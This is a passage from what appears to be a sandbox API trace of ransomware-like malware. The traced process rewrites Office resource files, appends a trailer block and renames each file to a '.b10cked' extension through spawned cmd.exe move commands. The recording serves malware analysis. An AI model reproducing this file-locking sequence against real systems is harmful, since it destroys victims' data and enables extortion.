lpOverlapped=0x0) returned 1 [0158.756] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8367, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x20b1 [0158.756] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x20af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x20af, lpOverlapped=0x0) returned 1 [0158.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0158.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0158.760] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4160 [0158.760] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0158.760] CloseHandle (hObject=0x114) returned 1 [0158.783] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX") returned 0x3c [0158.784] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0158.785] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xf48, dwThreadId=0x320)) returned 1 [0158.870] CloseHandle (hObject=0x1b4) returned 1 [0158.870] CloseHandle (hObject=0x114) returned 1 [0158.870] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.870] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.870] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0158.870] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.870] ReleaseMutex (hMutex=0xf8) returned 1 [0158.870] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.870] ReleaseMutex (hMutex=0xf8) returned 1 [0158.870] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.870] ReleaseMutex (hMutex=0xf8) returned 1 [0158.870] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.870] ReleaseMutex (hMutex=0xf8) returned 1 [0158.870] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.961] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.961] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.961] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.961] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21575269720) returned 1 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x6478 [0158.965] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6960 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6960 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0159.377] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x34af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x34af, lpOverlapped=0x0) returned 1 [0159.385] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0159.385] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x34af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x34af, lpOverlapped=0x0) returned 1 [0159.385] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x34b1 [0159.385] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x34af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x34af, lpOverlapped=0x0) returned 1 [0159.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x34b1 [0159.386] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x34af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x34af, lpOverlapped=0x0) returned 1 [0159.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0159.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISBRRES.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0159.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6960 [0159.391] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0159.391] CloseHandle (hObject=0x114) returned 1 [0159.394] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX") returned 0x3c [0159.395] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0159.395] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x7ac, dwThreadId=0x7f8)) returned 1 [0159.397] CloseHandle (hObject=0x1b4) returned 1 [0159.397] CloseHandle (hObject=0x114) returned 1 [0159.397] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0159.397] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0159.397] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0159.397] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0159.398] ReleaseMutex (hMutex=0xf8) returned 1 [0159.398] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0159.398] ReleaseMutex (hMutex=0xf8) returned 1 [0159.398] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0159.398] ReleaseMutex (hMutex=0xf8) returned 1 [0159.398] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0159.398] ReleaseMutex (hMutex=0xf8) returned 1 [0159.398] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21619041361) returned 1 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.402] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x77560 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0159.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x77078 [0159.403] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x77560 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 